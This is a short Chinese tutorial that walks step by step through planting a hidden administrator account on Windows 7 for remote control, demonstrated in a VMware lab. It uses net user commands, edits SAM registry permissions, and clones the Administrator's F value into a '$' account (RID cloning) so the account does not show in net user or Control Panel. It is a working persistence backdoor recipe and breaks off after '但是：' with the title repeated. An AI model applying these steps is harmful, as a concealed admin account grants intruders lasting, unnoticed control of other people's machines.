windows7系统隐藏账户的创建远程获取控制权

本文章使用windows7旗舰版系统，kali Linux系统，在VMware下进行啊演示。

1.对注册表授权
win+r //运行
regedit.exe //进入注册表
HKEY_LOCAL_MACHINE/SAM/SAM
修改SAM文件夹权限(右击SAM-权限设置Administrators用户允许完全控制)
2.新建特殊帐户
以管理员权限运行dos
net user test$ 123123 /add //添加用户test$ 密码设为123123
net localgroup administrators test$ /add //提升权限
net user //验证无法发现test帐户
但是在控制面板\用户帐户和家庭安全\用户帐户\管理帐户下可以找到test帐户
3.导出注册表
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/test$ 获取默认类型为0X3ed
将注册表HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/test$导出为1.reg
将注册表HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EB(3EB:test$的键值)导出为2.reg
默认情况下,管理员帐户administrator对应的注册表键值为
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4(administrator类型为1F4) 导出为3.reg
将2.reg中的键F的值替换成3.reg中键F中的值(记事本打开替换)

（这里的1，2是test$的注册表。 3是administrator的权限内容。所以需要复制3中的F键，注意下面图片标红的内容）

4.命令行删除特殊帐户
net user test$ /del //删除
5.导入reg文件
win+r打开运行
regedit /s 1.reg (计算机原因,命令不好用,直接在图形用户界面将注册表双击打开写入)
regedit /s 2.reg
(注意注册表键值要对应Names/test$中的键值与Uaers文件名的值要对应)
进入dos验证net user test$//可以查看
控制面板//不可见命令net user//不可见

/*隐藏账户已经创建完毕*/

但是：

windows7系统隐藏账户的创建远程获取控制权